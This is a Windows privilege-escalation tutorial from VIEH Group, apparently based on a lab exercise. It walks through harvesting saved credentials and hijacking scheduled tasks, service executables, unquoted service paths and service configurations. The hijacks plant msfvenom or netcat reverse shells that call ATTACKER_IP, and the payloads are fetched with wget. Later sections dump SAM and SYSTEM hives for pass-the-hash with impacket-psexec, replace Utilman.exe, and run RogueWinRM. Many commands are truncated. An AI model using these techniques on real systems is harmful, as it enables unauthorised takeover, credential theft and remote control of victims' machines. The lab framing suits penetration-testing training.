A D o c u m e n t s e r i e s b y V I E H G r o u p

Windows
privilege
Escalation
Getting into windows OS

1
 Disclaimer
Dear readers,
This document is provided by VIEH Group for educational purposes
only. While we strive for accuracy and reliability, we make no
warranties or representations regarding the completeness, accuracy, or
usefulness of the information presented herein. Any reliance you place
on this document is at your own risk. VIEH Group shall not be liable
for any damages arising from the use of or reliance on this document.
We acknowledge and appreciate the contribution of the source person.

also,
This document is not created by a professional content writer so any
mistake and error is a part of great design

Happy learning !!!

This document is credited to Unknown person (can mail us for

credits), whose exceptional insights elevate its value. Their
contribution is deeply appreciated, underscoring their significant role in
its creation.

Our newsletter: Cyber Arjun

Scan QR:

Social Media: @viehgroup viehgroup.com [email protected]

Windows Priv Escalation
Windows Users
Windows systems mainly have two kinds of users. Depending on their access levels, we can
categorise a user in one of the following groups:

These users have the most privileges. They can change any system configuration
Administration parameter and access any file in the system.

These users can access the computer but only perform limited tasks. Typically
Standard User these users can not make permanent or essential changes to the system and
are limited to their files.

SYSTEM / LocalSystem

An account used by the operating system to perform internal tasks. It has full access to
all files and resources available on the host with even higher privileges than
administrators.
Local Service

Default account used to run Windows services with "minimum" privileges. It will use
anonymous connections over the network.
Network Service

Default account used to run Windows services with "minimum" privileges. It will use the
computer credentials to authenticate through the network.

Harvesting Passwords from Usual Spots

1
Social Media: @viehgroup viehgroup.com [email protected]
Unattended Windows Installations
Places to Search for Passwords are:

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

PowerShell History
See PowerShell Commands History in CMD Using this Command

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShe

Note: The command above will only work from cmd.exe, as

PowerShell won't recognize %userprofile% as an environment variable.
To read the file from PowerShell, you'd have to replace %userprofile%
with $Env:userprofile.

Saved Windows Credentials

The command below will list saved credentials:

cmdkey /list

While you can't see the actual passwords, if you notice any credentials worth trying,
you can use them with the runas command and the /savecred option, as seen below.

runas /savecred /user:admin cmd.exe

2
Social Media: @viehgroup viehgroup.com [email protected]
IIS Configuration
C:\inetpub\wwwroot\web.config

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Here is a quick way to find database connection strings on the file:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\w

Retrieve Credentials from Software: PuTTY

To retrieve the stored proxy credentials, you can search under the following registry key
for ProxyPassword with the following command:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessio

Scheduled Tasks
Looking into scheduled tasks on the target system, you may see a scheduled task that
either lost its binary or it's using a binary you can modify.

Scheduled tasks can be listed from the command line using the
schtasks command without any options

schtasks /query /tn vulntask /fo list /v

3
Social Media: @viehgroup viehgroup.com [email protected]
The "Task to Run" parameter which indicates what gets executed by the scheduled task, and
the "Run As User" parameter, which shows the user that will be used to execute the task.

To check the file permissions on the executable, we use icacls

icacls c:\tasks\schtask.bat

If our current user can modify or overwrite the "Task to Run" executable, We Will Set NC
Reverse Shell There

C:\> icacls c:\tasks\schtask.bat c:\tasks\schtask.bat NT

AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(F)

Here BUILTIN\Users her Full Permission So Lets Change the Bat file to Execute a Rev shell.

4
Social Media: @viehgroup viehgroup.com [email protected]
 echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks

At Last Just Run the Task By our User

schtasks /run /tn vulntask

AlwaysInstallElevated
Windows installer files (also known as .msi files) are used to install applications on the
system. They usually run with the privilege level of the user that starts it. However, these can
be configured to run with higher privileges from any user account (even unprivileged ones).
This could potentially allow us to generate a malicious MSI file that would run with admin
privileges.

5
Social Media: @viehgroup viehgroup.com [email protected]
 Note: The AlwaysInstallElevated method won't work on this
room's machine and it's included as information only.

This method requires two registry values to be set. You can query these from the command
line using the commands below.

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Insta

C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Insta

To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be
possible. If these are set, you can generate a malicious .msi file using msfvenom, as seen
below:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.

As this is a reverse shell, you should also run the Metasploit Handler module configured
accordingly. Once you have transferred the file you have created, you can run the installer
with the command below and receive the reverse shell:

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations

Windows Services
Windows services are managed by the Service Control Manager (SCM).
So All Services have Executable Assigned to the services and to change them or make
any edit we need to Edit Discretionary Access Control List (DACL)

Which Basically Help With Permissions to Start , Stop , Restart , Query config or
Reconfig The Service.
Here we can see that the associated executable is specified through the
BINARY_PATH_NAME parameter, and the account used to run the service is
shown on the SERVICE_START_NAME parameter.

6
Social Media: @viehgroup viehgroup.com [email protected]
 C:\> sc qc apphostsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: apphostsvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.ex
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Host Helper Servic
DEPENDENCIES :
SERVICE_START_NAME : localSystem

All of the services configurations are stored on the registry under

HKLM\SYSTEM\CurrentControlSet\Services\<service_name>

A subkey exists for every service in the system. Again, we can see the associated
executable on the ImagePath value and the account used to start the service on
the

7
Social Media: @viehgroup viehgroup.com [email protected]
 ObjectName value. If a DACL has been configured for the service, it will be stored in a
subkey called Security. As you have guessed by now, only administrators can modify
such registry entries by default.
Insecure Permissions on Service Executable
If the executable associated with a service has weak permissions that allow an
attacker to modify or replace it, the attacker can gain the privileges of the service's
account trivially.

query the service configuration using sc

C:\> sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: windowsscheduler
TYPE : 10 WIN32_OWN_PR START_TYPE : 2
AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYST
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler
DEPENDENCIES :
SERVICE_START_NAME : .\svcuser1

The Executable in the result is

C:\PROGRA~2\SYSTEM~1\WService.exe
This mean it will get execute on running of the serivce.

8
Social Media: @viehgroup viehgroup.com [email protected]
 Let’s See if we can modify this exe to run a Netcat Rev shell by
editing it.
To Check Permission on any file we use icacls

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I
NT AUTHORIT BUILTIN\Adm BUILTIN\Use
APPLICATION APPLICATION

Successfully processed 1 files; Failed proces

As we see here Everyone has Permission to Modify (M)

Let’s Mofify this exe to a Rev Shell 🙂

1st Create a exe file using msfvenom and uplaod on the machine
with wget
Attacker Machine

user@attackerpc$ msfvenom -p windows/x64/shel

user@attackerpc$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0

9
Social Media: @viehgroup viehgroup.com [email protected]
 Victim Machine

wget http://ATTACKER_IP:8000/rev-svc.exe -O r

Now Modify the File and Five Full Permission to Everyone

We need another user to execute our payload, we'll want to
grant full permissions to the Everyone group
Victim Machine

C:\> cd C:\PROGRA~2\SYSTEM~1\

C:\PROGRA~2\SYSTEM~1> move WService.exe

WServ 1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-

unpri 1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> icacls WService.exe /gr

Successfully processed 1 files.

Attacker machine

user@attackerpc$ nc -lvp 4445

10
Social Media: @viehgroup viehgroup.com [email protected]
 At Last Restart the service to execute the Exe file of Rev Shell we
created

C:\> sc stop windowsscheduler

C:\> sc start windowsscheduler

Booooooommmmmmmmmmm

user@attackerpc$ nc -lvp 4445

Listening on 0.0.0.0 4445
Connection received on 10.10.175.90 50649
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights re

C:\Windows\system32>whoa
mi wprivesc1\svcusr1

GOOOOOOOOOOOOOT THEEEEEEEEEE
SHELLLLLLLLLLLLLLLLLLLLL

POC:::::::

11
Social Media: @viehgroup viehgroup.com [email protected]
 12
Social Media: @viehgroup viehgroup.com [email protected]
 Unquoted Service Paths
When we can't directly write into service executables as before, there might still be a
chance to force a service into running arbitrary executables by using a rather obscure
feature.

In Such Attacks We Can Manuplate system to execute another binary because of

Unquoted Path assigned to the executable to be executed.

Example :
Here is A Service with Quoted Path ——>> Secured

C:\> sc qc "vncserver"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vncserver
TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2
AUTO_START

14
Social Media: @viehgroup viehgroup.com [email protected]
 ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files\RealVNC\VNC
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VNC Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Here "C:\Program Files\RealVNC\VNC Server\vncserver.exe" is Quoted in “<>” So It

will take this address as one path.

Where Here is example of a Unsecured Path :

C:\> sc qc "disk sorter enterprise" [SC]

QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise

TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Ente
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Disk Sorter Enterprise
DEPENDENCIES :
SERVICE_START_NAME : .\svcusr2

Here C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe is not quoted in “<>”

So we can Manipulate the Binary by adding Files before the path.
Just like this :

SCM tries to execute the exe file but there is one problem >>
Whenever there is Spaces in the $PATH like The executable is
Present in Folder named ‘Service Server Files’ There is Space In

15
Social Media: @viehgroup viehgroup.com [email protected]
 Between and here the SCM Get Confused and have multiple results
….. which can be manipulated by user to execute the malware exe
file to get Shells.

It Work in this way >>>

Let’s Understand it with my example:

Let’s say you are a person who is read from starting and don’t
see Space or anything you just read alphabet to alphabet and
when it come a empty space i.e Space you get blank mind.

This same happed with it , but in this case it ignore the space
and then start reading the dir name again.
If We have Write Permission To the Directory

But what if We manipulate it by Creating another directory in

same path refrence without breaking the sequence ?
Yess !! Our Exe will run on the service

Let’s do it in prarticle:

Let’s Start with checking the permission for that

C:\>icacls c:\MyPrograms
c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)
BUILTIN\Administrators:(I)( BUILTIN\Users:(I)
(OI)(CI)(R BUILTIN\Users:(I)(CI)(AD)

16
Social Media: @viehgroup viehgroup.com [email protected]
 BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(I

Successfully processed 1 files; Failed pr The

BUILTIN\\Users group has AD and WD pr

Here we have AD and WD On Users so we can create SubDir

and Files here

Let’s Develop a Rev Shell with msfvenom and Manipulate it

on file system

user@attackerpc$ msfvenom -p windows/x64/

user@attackerpc$ nc -lvp 4446

Now Let’s Move the Exe to the path !!!!!!!! IMP STEP

We have to make Binary and put it before SCM Reaches the

Service Exe Dir

C:\> move C:\Users\thm-unpriv\rev-svc2.ex

C:\> icacls C:\MyPrograms\Disk.exe /grant

Successfully processed 1 files.

Also grant Permission so other user can execute it

17
Social Media: @viehgroup viehgroup.com [email protected]
 Restart the service

C:\> sc stop "disk sorter enterprise"

C:\> sc start "disk sorter enterprise"

BOOM Shell <3

user@attackerpc$ nc -lvp 4446

Listening on 0.0.0.0 4446
Connection received on 10.10.175.90 50650
Microsoft Windows [Version 10.0.17763.182 (c)
2018 Microsoft Corporation. All right

C:\Windows\system32>whoa
mi wprivesc1\svcusr2

POCCCCCCCCC

18
Social Media: @viehgroup viehgroup.com [email protected]
 Insecure Service Permissions
What if we have permission to edit config file of The Service ?
We will have access to change the Exec File to anywhere we want !! Simple As Fuck <3
Let’s Do it in praticle
To Find Weather user is allowed to edit the permission or not We use a utility known as
Accesschk
Link to Accesschk : https://learn.microsoft.com/en-

us/sysinternals/downloads/accesschk

Let’s 1st Check Permission for the Services

C:\tools\AccessChk> accesschk64.exe -qlc thms

[0] ACCESS_ALLOWED_ACE_TYPE: NT
AUTHORITY\S SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_PAUSE_CONTINUE

19
Social Media: @viehgroup viehgroup.com [email protected]
 SERVICE_START
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[4] ACCESS_ALLOWED_ACE_TYPE:
BUILTIN\Users SERVICE_ALL_ACCESS

We see here Users group have All Access to Service

We are allowed to reconfigure it let’s create a rev shell from this:

user@attackerpc$ msfvenom -p windows/x64/shel

user@attackerpc$ python3 -m http.server

Give Permission to others users too

C:\> icacls C:\Users\thm-unpriv\rev-svc3.exe

Now Edit the Service Config To Execute this binary:

C:\> sc config THMService binPath= "C:\Users\

Stop and Restart the service and Get the Shell 🙂

POCCCCCC???

Abusing dangerous privileges

20
Social Media: @viehgroup viehgroup.com [email protected]
Privileges are Right to do a task , example you are not allowed to change your bed according
to you as your more dont allow you ;) Joke apart Its a Right to do any task for write to it.
In windows any user privileges can be seen by this command

whoami /priv

Read about Perm here :

SeBackup / SeRestore

The SeBackup and SeRestore privileges allow users to read and

write to any file in the system, ignoring any DACL

Let’s See the Permission of this user:

C:\Windows\system32>whoami /priv

PRIVILEGES
INFORMATION -----------
-----------
Privilege Name Description
============================= ===============
SeBackupPrivilege Back up files a
SeRestorePrivilege Restore files a
SeShutdownPrivilege Shut down the s
SeChangeNotifyPrivilege Bypass traverse
SeIncreaseWorkingSetPrivilege Increase a proc

C:\Windows\system32>

21
Social Media: @viehgroup viehgroup.com [email protected]
 As we see we have Sebackup/SeRestore Perm.
We can use this to copy SAM and SYSTEM Hashes
Let’s do it in Praticle

To Copy Both Hash we have this commands:

C:\> reg save hklm\system C:\Users\THMBackup\

The operation completed successfully.

C:\> reg save hklm\sam C:\Users\THMBackup\sam

The operation completed successfully.

Now It’s time to copy this to main host (Kali Linux)

We can use any method here we are using Impacket Smbserver:

mkdir share
impacket-smbserver -smb2support -username THM

And use impacket to retrieve the users' password hashes:

impacket-secretsdump -sam sam.hive -system sy

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x36c8d26ec0df8b23

[*] Dumping local SAM hashes (uid:rid:lmhash:

22
Social Media: @viehgroup viehgroup.com [email protected]
Administrator:500:aad3b435b51404eeaad3b435b51
Guest:501:aad3b435b51404eeaad3b435b51404ee:31
DefaultAccount:503:aad3b435b51404eeaad3b435b5
WDAGUtilityAccount:504:aad3b435b51404eeaad3b4
THMBackup:1008:aad3b435b51404eeaad3b435b51404
THMTakeOwnership:1009:aad3b435b51404eeaad3b43 [*]
Cleaning up...

We can finally use the Administrator's hash to perform a Pass-

the- Hash attack and gain access to the target machine with
SYSTEM privileges:

impacket-psexec -hashes
aad3b435b51404eeaad3b Impacket v0.11.0 -
Copyright 2023 Fortra

[*] Requesting shares on 10.10.175.89.....

[*] Found writable share ADMIN$
[*] Uploading file WXhqNyDV.exe
[*] Opening SVCManager on 10.10.175.89.....
[*] Creating service XFMB on 10.10.175.89....
[*] Starting service XFMB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights re

C:\Windows\system32>

GOTTTTTTTTT THE SHELLLLLLL 🙂

23
Social Media: @viehgroup viehgroup.com [email protected]
 POCCCCCCCCCC:

SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the
system, including files and registry keys, opening up many possibilities for an
attacker to elevate privileges

Let’s First See the perm assigned to this user

C:\Windows\system32>whoami /priv

PRIVILEGES
INFORMATION -----------
-----------
Privilege Name Description

24
Social Media: @viehgroup viehgroup.com [email protected]
 =============================
=============== SeTakeOwnershipPrivilege Take
ownership SeChangeNotifyPrivilege Bypass
traverse SeIncreaseWorkingSetPrivilege Increase
a proc
C:\Windows\system32>

Now As we see SeTakeOwnershipPrivilege Perm is given this

mean we can change owner of files and objects.

We'll abuse utilman.exe to escalate privileges this time. Utilman is

a built-in Windows application used to provide Ease of Access
options during the lock screen:
Let’s Start by taking ownership of This exe to own

C:\Windows\system32>takeown /f C:\Windows\Sys

SUCCESS: The file (or folder): "C:\Windows\Sy

C:\Windows\system32>

As now we are owner let’s give ourself all perm to edit change this
file

C:\Windows\system32>icacls C:\Windows\System3
processed file: C:\Windows\System32\Utilman.e
Successfully processed 1 files; Failed proces

25
Social Media: @viehgroup viehgroup.com [email protected]
 C:\Windows\system32>

Now Let’s Change it with cmd as It will Be Started by SYSTEM

user Our CMD File will be executed by SYSTEM Giving us all The
Root Privileges

C:\Windows\system32>copy Utilman.exe
cmd.exe Overwrite cmd.exe? (Yes/No/All): All
Access is denied.
0 file(s) copied.

C:\Windows\system32>

Now Le’s Run this Utliman For this we need to lock the screen and
Run this from Screen Ascess 😒

SeImprsonate / SeAssignPrimaryToken

These privileges allow a process to impersonate other users and

act on their behalf.

26
Social Media: @viehgroup viehgroup.com [email protected]
 To use RogueWinRM, we first need to upload the exploit to the
target machine. For your convenience, this has already been done,
and you can find the exploit in the C:\tools\ folder.
The RogueWinRM exploit is possible because whenever a user
(including unprivileged users) starts the BITS service in Windows, it
automatically creates a connection to port 5985 using SYSTEM
privileges. Port 5985 is typically used for the WinRM service, which
is simply a port that exposes a Powershell console to be used
remotely through the network. Think of it like SSH, but using
Powershell.

If, for some reason, the WinRM service isn't running on the victim
server, an attacker can start a fake WinRM service on port 5985 and
catch the authentication attempt made by the BITS service when
starting. If the attacker has SeImpersonate privileges, he can execute
any command on behalf of the connecting user, which is SYSTEM.
Before running the exploit, we'll start a netcat listener to receive a
reverse shell on our attacker's machine:

c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\too

27
Social Media: @viehgroup viehgroup.com [email protected]
 Now Just need to Listen to Port 4442

Abusing vulnerable software

Outdated Software have Multiple Vuln and Some of them Even Allow user to Escalate Perm
to \SYSTEM user.

You can use the wmic tool to list software installed on the target
system and its versions.

wmic product get name,version,vendor

28
Social Media: @viehgroup viehgroup.com [email protected]
Thank you for taking the time to read through our publication. Your
continued support is invaluable.

Jai Hind!

Social Media: @viehgroup viehgroup.com [email protected]